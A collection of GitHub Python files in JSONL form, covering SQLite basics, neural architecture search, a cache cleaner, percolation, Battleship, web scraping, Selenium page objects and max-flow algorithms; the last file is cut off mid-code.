+{"seq_id":"36413815238","text":"import sqlite3\n\nconnect_db = sqlite3.connect(\"MyDatabase.sql3\")\n\n# could be created several cursors for parallel processing\ncursor = connect_db.cursor()\n\n# drop table if it exists\ncursor.execute(\"DROP TABLE IF EXISTS publisher\")\n\n# create a new table\ncursor.execute(\"\"\"CREATE TABLE publisher(\n pubid INT PRIMARY KEY,\n pubname VARCHAR(25),\n puburl VARCHAR(125))\"\"\")\n\n#drop table if it exists\ncursor.execute(\"DROP TABLE IF EXISTS book\")\n\n# create a new table\ncursor.execute(\"\"\"\\\n CREATE TABLE book (\n bkisbn CHAR(10) PRIMARY KEY,\n bktitle VARCHAR(60),\n bkyear INT,\n bkpubid INT,\n FOREIGN KEY(bkpubid) REFERENCES publisher(pubid))\n \"\"\")\n\n# create a simple list of publishers\nbook_tuple = (\n (\"Holden Web\", \"http://holdenweb.com\"),\n (\"Apress\", \"http://apress.com\"),\n (\"O`Reilly Media\", \"http://oreilly.com\"),\n (\"Packt Publisher\", \"http:///www.packtpub.com\")\n)\nbook_dict = {\n \"1565926218\": (\"Python Programming on Win32\", 1999, 2),\n \"1590597257\": (\"The Definitive Guide to Django\", 2011, 1),\n \"1234567890\": (\"No book You ever heard of\", 2015, 0),\n \"0569007973\": (\"The Python Cookbook\", 2009, 2),\n \"7818471947\": (\"Expert Python Programming\", 2012, 3)\n}\n\nISBN = \"1234567890\"\nbook = book_dict[ISBN]\npublisher = book_tuple[book[2]]\nprint(\"\"\"\\\nISBN {}\nTitle: {}\nYear: {}\nPublisher: {}\nURL: {}\"\"\".format(ISBN, book[0], book[1], publisher[0], publisher[1]))\n\n# insert data to the database\nfor i, publisher in enumerate(book_tuple):\n cursor.execute(\"\"\"\n INSERT INTO publisher (pubid, pubname, puburl)\n VALUES(?, ?, ?)\"\"\", (i, publisher[0], publisher[1]))\n\n# select all columns from te publisher table\ncursor.execute(\"SELECT * FROM publisher\")\ncursor.fetchall()\n\nfor ISBN, (title, year, pubid) in book_dict.items():\n cursor.execute(\"\"\"\n INSERT INTO book\n (bkisbn, bktitle, bkyear, bkpubid)\n VALUES (?, ?, ?, ?)\"\"\", (ISBN, title, year, pubid))\n\ncursor.execute(\"SELECT * FROM book\")\ncursor.fetchall()\n\n# retrieve a join of two tables\ncursor.execute(\"\"\"SELECT * FROM book JOIN publisher ON pubid=bkpubid\"\"\")\ncursor.fetchall()\n\nconnect_db.commit()\nconnect_db.close()\n","repo_name":"sergeyMelentyev/Python_Prime","sub_path":"SQLite_API.py","file_name":"SQLite_API.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32805352395","text":"import pdb\nimport argparse\nimport yaml\nimport os\nimport time\nimport sys\nimport numpy as np\nimport pipeline\nfrom helper import calc_param_size, print_red, ReduceLROnPlateau\nfrom .nas import ShellNet\n# from tqdm import tqdm\nfrom tqdm.notebook import tqdm\nfrom collections import defaultdict, Counter, OrderedDict\nimport pickle\nfrom paddle.fluid import core\nimport paddle.fluid as fluid\nfrom paddle.fluid.optimizer import Adam\nfrom paddle.fluid.layers import accuracy\nfrom .utils import load_opt\n\n\nDEBUG_FLAG = False\n\nclass Base:\n '''\n Base class for Searching and Training\n cf: config.yml path\n cv_i: Which fold in the cross validation. If cv_i >= n_fold: use all the training dataset.\n for_train: If True, for training process, otherwise for searching.\n '''\n def __init__(self, cf='config.yml', cv_i=0, for_train=False):\n self.cf = cf\n self.cv_i = cv_i\n self.for_train = for_train\n self._init_config()\n self._init_log()\n self._init_device()\n self._init_dataset()\n \n def _init_config(self):\n with open(self.cf) as f:\n self.config = yaml.load(f, Loader=yaml.FullLoader)\n return\n \n def _init_log(self):\n self.log_path = self.config['data']['log_path']['pp']\n try:\n os.mkdir(self.log_path)\n except FileExistsError:\n pass\n\n def _init_device(self):\n seed = self.config['data']['seed']\n np.random.seed(seed)\n if not core.is_compiled_with_cuda():\n print_red('PaddlePaddle for CPU!')\n return\n \n def _init_dataset(self):\n dataset = pipeline.Dataset(cf=self.cf, cv_i=self.cv_i, for_train=self.for_train)\n self.train_generator = dataset.train_generator\n self.val_generator = dataset.val_generator\n return\n\nclass Searching(Base):\n '''\n Searching process\n cf: config.yml path\n cv_i: Which fold in the cross validation. If cv_i >= n_fold: use all the training dataset.\n new_lr: if True, check_resume() will not load the saved states of optimizers and lr_schedulers.\n '''\n def __init__(self, cf='config.yml', cv_i=0, new_lr=False):\n super().__init__(cf=cf, cv_i=cv_i)\n self._init_model()\n self.check_resume(new_lr=new_lr)\n \n def _init_model(self):\n self.model = ShellNet(in_channels=self.config['data']['in_channels'], \n init_node_c=self.config['search']['init_node_c'], \n out_channels=self.config['data']['out_channels'], \n depth=self.config['search']['depth'], \n n_nodes=self.config['search']['n_nodes'])\n print('Param size = {:.3f} MB'.format(calc_param_size(self.model.parameters())))\n self.loss = lambda props, y_truth: fluid.layers.reduce_mean(fluid.layers.softmax_with_cross_entropy(props, y_truth))\n self.optim_shell = Adam(parameter_list=self.model.alphas()) \n self.optim_kernel = Adam(parameter_list=self.model.kernel.parameters())\n self.shell_scheduler = ReduceLROnPlateau(self.optim_shell)\n self.kernel_scheduler = ReduceLROnPlateau(self.optim_kernel)\n\n def check_resume(self, new_lr=False):\n self.last_save = os.path.join(self.log_path, self.config['search']['last_save'])\n self.last_aux = os.path.join(self.log_path, self.config['search']['last_aux'])\n if os.path.exists(self.last_aux):\n self.model.set_dict(fluid.dygraph.load_dygraph(self.last_save)[0])\n with open(self.last_aux, 'rb') as f:\n state_dicts = pickle.load(f)\n self.epoch = state_dicts['epoch'] + 1\n self.geno_count = state_dicts['geno_count']\n self.history = state_dicts['history']\n if not new_lr:\n self.optim_shell.set_dict(load_opt(self.last_save+'_shell.pdopt'))\n self.optim_kernel.set_dict(load_opt(self.last_save+'_kernel.pdopt'))\n self.shell_scheduler.load_state_dict(state_dicts['shell_scheduler'])\n self.kernel_scheduler.load_state_dict(state_dicts['kernel_scheduler'])\n else:\n self.epoch = 0\n self.geno_count = Counter()\n self.history = defaultdict(list)\n\n def search(self):\n '''\n Return the best genotype in tuple:\n (best_gene: str(Genotype), geno_count: int)\n '''\n# pdb.set_trace()\n geno_file = os.path.join(self.log_path, self.config['search']['geno_file'])\n if os.path.exists(geno_file):\n print('{} exists.'.format(geno_file))\n with open(geno_file, 'rb') as f:\n return pickle.load(f)\n\n best_gene = None\n best_geno_count = self.config['search']['best_geno_count']\n n_epochs = self.config['search']['epochs']\n for epoch in range(n_epochs):\n gene = str(self.model.get_gene())\n self.geno_count[gene] += 1\n if self.geno_count[gene] >= best_geno_count:\n print('>= best_geno_count: ({})'.format(best_geno_count))\n best_gene = (gene, best_geno_count)\n break\n\n shell_loss, kernel_loss, shell_acc, kernel_acc = self.train()\n \n self.shell_scheduler.step(shell_loss)\n self.kernel_scheduler.step(kernel_loss)\n self.history['shell_loss'].append(shell_loss)\n self.history['kernel_loss'].append(kernel_loss)\n self.history['shell_acc'].append(shell_acc)\n self.history['kernel_acc'].append(kernel_acc)\n \n \n # Save what the current epoch ends up with.\n fluid.save_dygraph(self.model.state_dict(), self.last_save)\n fluid.save_dygraph(self.optim_shell.state_dict(), self.last_save+'_shell')\n fluid.save_dygraph(self.optim_kernel.state_dict(), self.last_save+'_kernel')\n state_dicts = {\n 'epoch': self.epoch,\n 'geno_count': self.geno_count,\n 'history': self.history,\n 'kernel_scheduler': self.kernel_scheduler.state_dict(),\n 'shell_scheduler': self.kernel_scheduler.state_dict(),\n }\n with open(self.last_aux, 'wb') as f:\n pickle.dump(state_dicts, f)\n \n self.epoch += 1\n if self.epoch > n_epochs:\n break\n \n if DEBUG_FLAG and epoch >= 3:\n break\n \n if best_gene is None:\n gene = str(self.model.get_gene())\n self.geno_count[gene] += 1\n best_gene = (gene, self.geno_count[gene])\n with open(geno_file, 'wb') as f:\n pickle.dump(best_gene, f)\n return best_gene\n \n \n def train(self):\n '''\n Searching | Training process\n To do optim_shell.step() and optim_kernel.step() alternately.\n '''\n self.model.train()\n train_epoch = self.train_generator.epoch()\n val_epoch = self.val_generator.epoch()\n n_steps = self.train_generator.steps_per_epoch\n sum_loss = 0\n sum_val_loss = 0\n sum_acc = 0\n sum_val_acc = 0\n with tqdm(train_epoch, total = n_steps,\n desc = 'Searching | Epoch {}'.format(self.epoch)) as pbar:\n for step, (x, y_truth) in enumerate(pbar):\n x = fluid.dygraph.to_variable(x.astype('float32'))\n y_truth = fluid.dygraph.to_variable(y_truth.astype('int64')[:,np.newaxis])\n try:\n val_x, val_y_truth = next(val_epoch)\n except StopIteration:\n val_epoch = self.val_generator.epoch()\n val_x, val_y_truth = next(val_epoch)\n val_x = fluid.dygraph.to_variable(val_x.astype('float32'))\n val_y_truth = fluid.dygraph.to_variable(val_y_truth.astype('int64')[:,np.newaxis])\n \n # optim_shell\n val_y_pred = self.model(val_x)\n val_loss = self.loss(val_y_pred, val_y_truth)\n sum_val_loss += val_loss.numpy()[0]\n val_acc = fluid.layers.accuracy(val_y_pred, val_y_truth, k=1)\n sum_val_acc += val_acc.numpy()[0]\n val_loss.backward()\n self.optim_shell.minimize(val_loss)\n self.optim_shell.clear_gradients()\n \n # optim_kernel\n y_pred = self.model(x)\n loss = self.loss(y_pred, y_truth)\n sum_loss += loss.numpy()[0]\n acc = fluid.layers.accuracy(y_pred, y_truth, k=1)\n sum_acc += acc.numpy()[0]\n loss.backward()\n self.optim_kernel.minimize(loss)\n self.optim_kernel.clear_gradients()\n \n # postfix for progress bar\n postfix = OrderedDict()\n postfix['Loss(optim_shell)'] = round(sum_val_loss/(step+1), 3)\n postfix['Acc(optim_shell)'] = round(sum_val_acc/(step+1), 3)\n postfix['Loss(optim_kernel)'] = round(sum_loss/(step+1), 3)\n postfix['Acc(optim_kernel)'] = round(sum_acc/(step+1), 3)\n pbar.set_postfix(postfix)\n \n if DEBUG_FLAG and step > 1:\n break\n \n return [round(i/n_steps,3) for i in [sum_val_loss, sum_loss, sum_val_acc, sum_acc]]\n \n \n \nif __name__ == '__main__':\n with fluid.dygraph.guard():\n s = Searching()\n gene = s.search()","repo_name":"woodywff/darts_pt_pp_tf","sub_path":"darts_pp/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":9639,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"23607620829","text":"# Import necessary modules\r\nimport os\r\nimport shutil\r\n\r\n\r\n# Function to collect cache\r\ndef collect_cache(folder_path):\r\n # Get the list of files and folders in the specified folder\r\n items_for_cache = os.listdir(folder_path)\r\n\r\n # Iterate over each item\r\n for item in items_for_cache:\r\n item_path = os.path.join(folder_path, item)\r\n\r\n if os.path.isfile(item_path):\r\n # If it's a file, remove it\r\n os.remove(item_path)\r\n elif os.path.isdir(item_path):\r\n # If it's a subfolder, recursively call collect_cache\r\n collect_cache(item_path)\r\n\r\n # Remove the empty folder after cleaning the cache\r\n os.rmdir(folder_path)\r\n\r\n\r\n# Example for usage\r\ncache_folder = \"/path/to/cache/folder\"\r\ncollect_cache(cache_folder)\r\n","repo_name":"shahzaibkhan2/Python-Advanced-Projects","sub_path":"code-for-collecting-and-cleaning-cache/collect_clean_cache.py","file_name":"collect_clean_cache.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"15091653795","text":"import os, sys\nsys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\n\nimport random\nfrom weighted_quick_union import UnionFind\n\nclass Percolation:\n \"\"\"Simulate Percolation to observe state change\"\"\"\n def __init__(self, side):\n self.side = side\n\n ## the first and last elements of list are vitual top and virtual bottom\n ## accessing any element from the list would be \n ## ( side * (row-1) + col )\n self.uf = UnionFind(side**2 + 2)\n\n self.track_open = [False for i in range(side**2 + 2)]\n self.track_open[:side+1] = [True for i in range(side+1)]\n self.track_open[side*(side-1)+1:] = [True for i in range(side+1)]\n self.open_sites = 0\n\n ## Opening and connecting virtual sites\n for i in range(1,6):\n ## connect top row to virtual top\n self.uf.union(0,i)\n ## connect bottom row to virtual bottom\n self.uf.union(side**2 + 1, side * (side-1) + i)\n\n\n def isOpen(self, row, col):\n return self.track_open[self.getBlockNumber(row, col)] == True\n\n def open(self, row, col):\n ## for 8 x 8 land; side = 8\n ## row = 3, col = 4; \n ## block no = 20\n ## neighbours = 19, 21, 28, 12\n if self.isOpen(row, col):\n return\n\n block_number = self.getBlockNumber(row, col)\n\n neighbours = [\n (row, col + 1), ## right\n (row, col - 1), ## left\n (row - 1, col), ## up\n (row + 1, col), ## down\n ]\n \n if row == 1:\n neighbours[2] = 0\n elif row == self.side:\n neighbours[-1] = self.side**2 + 1\n if col == 1:\n neighbours.pop(1)\n elif col == self.side:\n neighbours.pop(0)\n\n for neighbour in neighbours:\n if type(neighbour) is int:\n ## setting nrow and ncol to get virtuals\n if neighbour == 0:\n nrow, ncol = 1, 0\n else:\n nrow, ncol = self.side+1, 1 \n\n block_neighbour = neighbour\n\n elif type(neighbour) is tuple:\n nrow, ncol = neighbour[0], neighbour[1]\n block_neighbour = self.getBlockNumber(nrow, ncol)\n\n # print(block_neighbour)\n ## possible bug:: bottom tap is on False until percolated\n ## If condition may fail\n if self.isOpen(nrow, ncol):\n self.uf.union(block_number, block_neighbour)\n\n self.track_open[block_number] = True\n self.open_sites += 1\n\n def isFull(self, row, col):\n return self.uf.connected(self.getBlockNumber(row, col), 0)\n\n def numberOfOpenSites(self):\n return self.open_sites\n\n def percolates(self):\n percolates = self.uf.connected(0, self.side**2 + 1)\n if percolates:\n self.track_open[-1] = True\n return True\n else:\n return False\n\n def getBlockNumber(self, row, col):\n # print(row, col)\n return (self.side * (row - 1) + col) \n\ndef display(land):\n print(f\"Virtual Top:: {land.uf.data[0]}\")\n for index, block in enumerate(land.uf.data[1:-1]):\n if index % land.side == 0:\n print(\"\\n\")\n print(block, end =\"\\t\")\n print(\"\\n\\nVirtual Bottom:: {}\".format(land.uf.data[-1]))\n \n print(\"\\n\\n\\n\")\n\n print(f\"Virtual Top:: {land.track_open[0]}\")\n for index, block in enumerate(land.track_open[1:-1]):\n if index % land.side == 0:\n print(\"\\n\")\n print(block, end =\"\\t\")\n print(\"\\n\\nVirtual Bottom:: {}\".format(land.track_open[-1]))\n print(\"-\"*50)\n\ndef main(land):\n while not land.percolates():\n i, j = (random.randint(2, land.side-1) for i in range(2))\n # print(block)\n # breakpoint()\n land.open(i, j)\n\n # display(land)\n print(f\"Number of open sites:: {land.numberOfOpenSites()}\")\n\n threshold = land.numberOfOpenSites() / (land.side**2) * 100\n return threshold\n\nif __name__ == '__main__':\n # land = Percolation(100)\n # print(land.getBlockNumber(7,4))\n simulations = 50\n total_time = 0\n average = 0\n\n for i in range(simulations):\n land = Percolation(100)\n total_time += main(land)\n average = total_time / simulations\n print(f\"Average opened sites for Percolation:: {average}\")\n # print(f\"Percolates at threshold:: {main(land)}\")","repo_name":"adityamonga/Algorithms","sub_path":"UnionFind/percolation/percolation.py","file_name":"percolation.py","file_ext":"py","file_size_in_byte":4428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36199949301","text":"import itertools\n\nblankBoard_columns = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J' ]\nblankBoard_rows = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n\n\nclass Player:\n def __init__(self, name, Carrier, BattleShip, Destroyer, Submarine, PatrolBoat):\n self.name = name\n self.Carrier = Carrier.split('/')\n self.BattleShip = BattleShip.split('/')\n self.Destroyer = Destroyer.split('/')\n self.Submarine = Submarine.split('/')\n self.PatrolBoat = PatrolBoat.split('/')\n\n self.Carrier_Col = (self.Carrier[0])\n self.Carrier_Row = list((self.Carrier[1]))\n self.Carrier_Row = [int(item) for item in self.Carrier_Row]\n self.Carrier = []\n self.Carrier.append(self.Carrier_Col)\n self.Carrier.append(list(self.Carrier_Row))\n\n self.BattleShip_Col = (self.BattleShip[0])\n self.BattleShip_Row = list((self.BattleShip[1]))\n self.BattleShip_Row = [int(item) for item in self.BattleShip_Row]\n self.BattleShip = []\n self.BattleShip.append(self.BattleShip_Col)\n self.BattleShip.append(list(self.BattleShip_Row))\n\n self.Destroyer_Col = (self.Destroyer[0])\n self.Destroyer_Row = list((self.Destroyer[1]))\n self.Destroyer_Row = [int(item) for item in self.Destroyer_Row]\n self.Destroyer = []\n self.Destroyer.append(self.Destroyer_Col)\n self.Destroyer.append(list(self.Destroyer_Row))\n\n self.Submarine_Col = (self.Submarine[0])\n self.Submarine_Row = list((self.Submarine[1]))\n self.Submarine_Row = [int(item) for item in self.Submarine_Row]\n self.Submarine = []\n self.Submarine.append(self.Submarine_Col)\n self.Submarine.append(list(self.Submarine_Row))\n\n self.PatrolBoat_Col = (self.PatrolBoat[0])\n self.PatrolBoat_Row = list((self.PatrolBoat[1]))\n self.PatrolBoat_Row = [int(item) for item in self.PatrolBoat_Row]\n self.PatrolBoat = []\n self.PatrolBoat.append(self.PatrolBoat_Col)\n self.PatrolBoat.append(list(self.PatrolBoat_Row))\n\n return\n\n def Overlapping(self):\n self.cart_Carrier = itertools.product(self.Carrier[0], self.Carrier[1])\n self.cart_BattleShip = itertools.product(self.BattleShip[0], self.BattleShip[1])\n self.cart_Destroyer = itertools.product(self.Destroyer[0], self.Destroyer[1])\n self.cart_Submarine = itertools.product(self.Submarine[0], self.Submarine[1])\n self.cart_PatrolBoat = itertools.product(self.PatrolBoat[0], self.PatrolBoat[1])\n\n self.cart_Carrier = list(self.cart_Carrier)\n self.cart_BattleShip = list(self.cart_BattleShip)\n self.cart_Destroyer = list(self.cart_Destroyer)\n self.cart_Submarine = list(self.cart_Submarine)\n self.cart_PatrolBoat = list(self.cart_PatrolBoat)\n self.cart_Total2 = self.cart_Carrier + self.cart_BattleShip + self.cart_Destroyer + self.cart_Submarine + self.cart_PatrolBoat\n\n for k in self.cart_Total2:\n if self.cart_Total2.count(k) > 1:\n print('Overlapping found, calculating again')\n print(f'overlapping occurred at {k}')\n print(\"Please re-enter Coordinates\")\n break\n\n return self.cart_Total2\n","repo_name":"do7urden/LocalWorkGround","sub_path":"OD_HW_BTE514B/HW_8/Player1_HW_8.py","file_name":"Player1_HW_8.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33158500891","text":"# https://httpbin.org\n# pip install requests\n\nimport requests\n\nBASE_URL = \"https://httpbin.org/\"\n\nresponse = requests.get(\n BASE_URL + \"/get?test=hello&other=world\", headers={\"User-Agent\": \"something else\"}\n)\nresponse = response.json()\ndel response[\"origin\"]\n\nprint(response)\n","repo_name":"FDlucifer/python-climb-learning-tutorial","sub_path":"python-tips-and-tricks/HTTPBin - Experimenting, Debugging & Testing of Network Applications/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"32"} +{"seq_id":"30564708646","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\n\ndef findpeople():\n driver = webdriver.Chrome('/Users/sungmin/chromedriver')\n driver.get('http://www.gdlibrary.or.kr/gilib/1000658/100049/bbsList.do')\n\n url = 'http://www.gdlibrary.or.kr/gilib/1000658/100049/bbsList.do'\n req = requests.get(url)\n html = req.text\n soup = BeautifulSoup(html, 'html.parser')\n\n nowday = \"2020-09-05\"\n rank= 0\n ##첫페이지\n for tag in soup.select('td'):\n if tag.text == nowday:\n rank=rank+1\n\n ##두번쨰페이지\n driver.find_element_by_xpath(\"\"\"//*[@id=\"listForm\"]/div[2]/p/span[2]/a\"\"\").click()\n for tag in soup.select('td'):\n if tag.text == nowday:\n rank=rank+1\n \n ##세번째페이지\n driver.find_element_by_xpath(\"\"\"//*[@id=\"listForm\"]/div[2]/p/span[6]/a\"\"\").click()\n for tag in soup.select('td'):\n if tag.text == nowday:\n rank=rank+1\n\n print(\"오늘의 안심도서대출은 \"+str(rank-1) +\"명 입니다.\")\n\n\nfindpeople()\n\n\n\"\"\"\"\n//*[@id=\"listForm\"]/div[2]/p/span[4]/a\n//*[@id=\"listForm\"]/div[2]/p/span[5]/a\n//*[@id=\"listForm\"]/div[2]/p/span[6]/a\n//*[@id=\"listForm\"]/div[2]/p/span[7]/a\n//*[@id=\"listForm\"]/div[2]/p/span[8]/a\n//*[@id=\"listForm\"]/div[2]/p/span[12]/a\n//*[@id=\"listForm\"]/div[2]/p/span[4]/a\nrank= 0\nnow = datetime.datetime.now()\nnowday1 = (str(now.year)+\"-\"+str(now.month)+\"-\"+str(now.day))\nnowday = \"2020-08-28\"\n\"\"\"\n\n","repo_name":"sungmin69355/webcrawling","sub_path":"gdlibrary.py","file_name":"gdlibrary.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20541042529","text":"import time\nimport pytest\nfrom selenium import webdriver\nfrom selenium.webdriver.remote.webdriver import WebDriver\nfrom allure_commons._allure import step, attach\nfrom allure import attachment_type\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common import action_chains\n\n\nclass UserWorkspacePage(object):\n def __init__(self, web_driver):\n self.driver = web_driver\n self.diprella_header = WebDriverWait(self.driver, 10).until(\n EC.visibility_of_element_located((By.CSS_SELECTOR, \".main__wrapper\")))\n self.diprella_logo = WebDriverWait(self.driver, 15).until(\n EC.visibility_of_element_located((By.CSS_SELECTOR, \".header__logo\")))\n self.course_search = self.driver.find_element_by_xpath(\"//input[@id='search' and @type='text']\")\n self.recommendations = self.driver.find_element_by_xpath(\"//section[@class='recomendations'][1]\")\n self.popular = self.driver.find_element_by_xpath(\"//section[@class='recomendations'][2]\")\n self.lector_menu = 0\n self.user_menu = 0\n attach(\n self.driver.get_screenshot_as_png(),\n name=\"User workspace page screenshot\",\n attachment_type=attachment_type.PNG\n )\n\n @step(\"Opening Lector menu\")\n def open_lector_menu(self):\n action_chains.ActionChains(self.driver).move_to_element(\n self.driver.find_element_by_xpath(\"//nav/a/span[text()='Лектор']\")\n ).click().perform()\n time.sleep(0.5)\n self.lector_menu = self.driver.find_element_by_xpath(\"//div[@class='lecturer__dropdown']\")\n attach(\n self.driver.get_screenshot_as_png(),\n name=\"User workspace page with opened Lector menu\",\n attachment_type=attachment_type.PNG\n )\n return self\n\n @step(\"Opening User menu\")\n def open_user_menu(self):\n action_chains.ActionChains(self.driver).move_to_element(\n self.driver.find_element_by_css_selector(\"a.home__header-nav-link:nth-child(2)\")\n ).click().perform()\n time.sleep(0.5)\n self.user_menu = self.driver.find_element_by_xpath(\"//div[@class='user__dropdown']\")\n attach(\n self.driver.get_screenshot_as_png(),\n name=\"User workspace page with opened User menu\",\n attachment_type=attachment_type.PNG\n )\n return self\n","repo_name":"51stRoR/DiprellaNK","sub_path":"page_objects/userworkspace_page.py","file_name":"userworkspace_page.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12400992055","text":"from datetime import timedelta\r\n\r\nfrom django.utils.timezone import now\r\nfrom psqlextra.query import ConflictAction\r\nfrom psqlextra.util import postgres_manager\r\n\r\nfrom .esi import ESI\r\nfrom .models import Alliance, Corporation, Character\r\nfrom .utils import chunker\r\n\r\n\r\ndef hydrate(Model, ids, days_until_dehydrated=14):\r\n \"\"\"\r\n Make sure these objects exist in the database.\r\n Returns the number of dry objects that were hydrated.\r\n \"\"\"\r\n hydrated = set(Model.objects.filter(\r\n id__in=ids,\r\n updated__gt=now() - timedelta(days=days_until_dehydrated)\r\n ).values_list('id', flat=True))\r\n dry = set(ids) - hydrated\r\n\r\n if len(dry) < 1:\r\n return 0\r\n\r\n # Resolve dry objects from ESI\r\n objects = []\r\n api = ESI()\r\n for ids in chunker(dry, 1000):\r\n response = api.post(\"/latest/universe/names/\", json=ids)\r\n for item in response.json():\r\n objects.append({\r\n 'id': item['id'],\r\n 'name': item['name']\r\n })\r\n with postgres_manager(Model) as manager:\r\n manager.on_conflict(['id'], ConflictAction.UPDATE).bulk_insert(objects)\r\n return len(dry)","repo_name":"skyride/capritools3","sub_path":"core/bulk.py","file_name":"bulk.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"33090446667","text":"#!/usr/bin/python3\n# coding: utf-8\n# + 是边的起点\nimport pprint\nimport numpy as np\n##################################################################\n## 原始图: 最大流: 最终结果为 23\n# 12 12\n# 1+-------->3 1+-------->3\n# /+^ /^+ /^ ^+\n# 16 / || / | \\20 11 / | | \\19\n# / ||4 / | \\ / | | \\\n# + || 9 / | \\ + | | \\\n# 0 10|| / |7 5 0 |1 |7 5\n# + || / | / + | | /\n# 13\\ || / | / 12\\ | | /\n# \\ || / | /4 \\ | | /4\n# \\v++ ++ \\+ ++\n# 2+-------->4 2+-------->4\n# 14 11\ngraph = [[0, 16, 13, 0, 0, 0],\n [0, 0, 10, 12, 0, 0],\n [0, 4, 0, 0, 14, 0],\n [0, 0, 9, 0, 0, 20],\n [0, 0, 0, 7, 0, 4],\n [0, 0, 0, 0, 0, 0]]\n##################################################################\n## 一: Ford Fulkerson\nclass Graph: # 虽然很不喜欢 class, 但这里确实比较方便\n def __init__(self, graph):\n self.graph = graph # residual graph\n self.ROW = len(graph)\n def BFS(self, s, t, parent): # Returns true if there is a path from source 's' to sink 't' in residual graph. Also fills parent[] to store the path\n vis, queue = {s}, [s] # Mark all the vertices as not visited\n while queue:\n u = queue.pop(0) # Dequeue a vertex from queue\n for ind, val in enumerate(self.graph[u]): # 这里的 ind 是刚好表示 ID\n if ind not in vis and val > 0 :\n vis.add(ind)\n queue.append(ind)\n parent[ind] = u # 存储每次找到的路径, FordFulkerson() 会用\n return True if t in vis else False\n def FordFulkerson(self, source, sink): # Returns tne maximum flow from s to t in the given graph\n parent = [-1] * (self.ROW) # This array is filled by BFS and to store path\n max_flow = 0 # There is no flow initially\n while self.BFS(source, sink, parent): # 每执行一次 BFS, parent 中就会存一次从 s -> t 的路径\n path_flow = float(\"Inf\")\n s = sink\n while(s != source): # Find minimum residual capacity of the edges along the path filled by BFS. Or we can say find the maximum flow through the path found.\n path_flow = min(path_flow, self.graph[parent[s]][s])\n s = parent[s] # 这里的循环很不和谐, 下一步用函数式改写\n # 上面的���环不能和下面的合并, 因为要先找到瓶颈 path_flow\n max_flow += path_flow # Add path flow to overall flow\n v = sink\n while(v != source): # update residual capacities of the edges and reverse edges along the path\n u = parent[v]\n self.graph[u][v] -= path_flow\n self.graph[v][u] += path_flow\n v = parent[v]\n return max_flow\n#################################\n## 测试 graph 矩阵\ng = Graph(graph)\nprint(\"The maximum possible flow is %d \" % g.FordFulkerson(0, 5))\n#################################\n## 测试 算法作业数据集\n# For each data set, the first line has two number N and M, which means the number of jobs and the number of computers.\n# Next N line, each line for a job, has two number which means the two computers.\nraw = \"4 2\\n 1 2\\n 1 2\\n 1 2\\n 1 2\" # file = open(problem1.data).read()\njobs, computers = [int(x) for x in raw.split('\\n')[0].split()]\n# 构造 graph; 好不美观啊...\ngraph = np.zeros((jobs + computers + 2, jobs + computers + 2), dtype=np.int); pprint.pprint(graph)\nfor i in range(jobs): graph[0][i + 1] = 1 # s 到 jobs 边填充 1; 单向的\nfor idx, line in enumerate(raw.split('\\n')[1:]): # 这里以后也要用函数式写出来\n print(idx, line)\n for computer_id in [int(x) for x in line.split()]:\n graph[idx + 1][jobs + computer_id] = 1 # 单向, 从 jobs 到 computers\n# 二分法查找\nL, R = jobs // computers, jobs; print(L, R)\nwhile L < R:\n tmp = graph.copy()\n k = (L + R) // 2; print(k)\n tmp[jobs + 1:-1, -1] = k\n pprint.pprint(tmp)\n flow = Graph(tmp).FordFulkerson(0, jobs + computers + 1)\n if flow == jobs: R = k\n else: L = k\nprint('The min-max load is', k)\nprint(\"The maximum possible flow is %d \" % flow)\n\n##################################################################\n## 二: Push Relabel\n## 这里没用 class; 但还是用 class 方便\ndef push(Gf, height, excess_flow, u):\n if excess_flow[u] <= 0: return False\n for v in range(len(Gf)):\n if v != u and Gf[u][v] > 0 and height[u] == height[v] + 1:\n df = min(excess_flow[u], Gf[u][v])\n Gf[u][v] -= df\n Gf[v][u] += df\n excess_flow[u] -= df\n excess_flow[v] += df\n return True\n return False\ndef relabel(Gf, height, excess_flow, u):\n if excess_flow[u] <= 0: return False\n min_h = np.inf\n for v in range(len(Gf)):\n if v != u and Gf[u][v] > 0:\n if height[u] > height[v]: return False\n else: min_h = min(min_h, height[v])\n height[u] = min_h + 1\n return True\ndef initialize_preflow(G, s):\n n = len(G)\n height = [0] * n\n excess_flow = [0] * n\n height[s] = n\n for v in range(n): # 将 excess_flow 中与 s 紧邻的进行初始化\n if v != s and G[s][v] != 0: # 写的不好...\n excess_flow[v] = G[s][v]\n excess_flow[s] -= G[s][v]\n G[v][s] = G[s][v]\n G[s][v] = 0\n return G, height, excess_flow\ndef push_relabel(G, s, t): # 算法实现主体\n n = len(G)\n Gf, height, excess_flow = initialize_preflow(G, s)\n while True:\n push_or_relabel = False\n for u in range(n):\n if u != s and u != t:\n if push(Gf, height, excess_flow, u):\n push_or_relabel = True\n break\n if relabel(Gf, height, excess_flow, u):\n push_or_relabel = True\n break\n if not push_or_relabel: break\n # else: print(Gf)\n max_flow = 0\n for j in range(n): 